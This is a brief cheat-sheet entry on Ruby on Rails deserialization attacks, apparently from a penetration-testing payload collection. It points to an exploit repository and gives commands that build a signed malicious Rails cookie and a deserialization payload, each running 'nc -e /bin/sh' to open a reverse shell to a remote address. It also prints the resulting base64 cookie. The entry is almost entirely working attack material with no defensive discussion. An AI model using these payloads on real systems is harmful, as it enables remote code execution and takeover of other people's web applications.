Ruby Deserialization
Ruby Deserialization¶
https://github.com/frohoff/rails_exploits
Generate Rails Cookie with secret:
ruby rails_cookie_rce.rb -s mysecret -c 'nc -e /bin/sh 10.0.0.1 1234'
BAh7Bm86QEFjdGl2ZVN1cHBvcnQ6OkRlcHJlY2F0aW9uOjpEZXByZWNhdGVkSW5zdGFuY2VWYXJpYWJsZVByb3h5CToOQGluc3RhbmNlbzoIRVJCBjoJQHNyY0kiImBuYyAtZSAvYmluL3NoIDEwLjAuMC4xIDEyMzRgBjoGRVQ6DEBtZXRob2Q6C3Jlc3VsdDoJQHZhckkiCGZvbwY7CVQ6EEBkZXByZWNhdG9ybR9BY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbkkiDnNvbWV0aGluZwY7CVQ=--ee8811f9557e6108a4e7479fa83a44c50bf1cc3c
Generate Rails Deseralization:
ruby rails_deser_rce.rb -c "nc -e /bin/sh 10.0.0.1 1234" > rails_rce.bin